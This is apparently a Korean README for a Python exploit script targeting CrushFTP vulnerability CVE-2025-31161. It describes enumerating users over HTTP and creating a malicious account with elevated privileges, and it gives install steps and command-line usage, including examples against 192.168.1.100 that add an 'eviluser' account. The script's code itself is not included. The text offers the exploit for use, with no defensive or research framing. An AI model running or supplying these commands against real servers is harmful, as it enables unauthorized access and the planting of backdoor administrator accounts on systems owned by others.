
CVE-2025-31161을 대상으로 하는 CrushFTP용 Python 익스플로잇 스크립트입니다. HTTP 요청을 통해 사용자를 열거하고 상승된 권한으로 악성 계정을 생성합니다.
이 저장소에는 CVE-2025-31161에 취약한 CrushFTP 서비스와 상호작용하기 위한 Python 스크립트가 포함되어 있습니다. 이 스크립트를 사용하면 취약점을 악용하여 기존 사용자를 나열하고 악의적인 사용자를 추가할 수 있습니다.
requests 모듈pip install -r requirements.txt
python3 CVE-2025-31161.py listusers --ip <IP> --port <PORT>
python3 CVE-2025-31161.py adduser --ip <IP> --port <PORT> --valid_username <VALID_ADMIN> --username <NEW_USER> --password <PASSWORD>
python3 CVE-2025-31161.py listusers --ip 192.168.1.100 --port 80
python3 CVE-2025-31161.py adduser --ip 192.168.1.100 --port 8080 --username eviluser --password 1234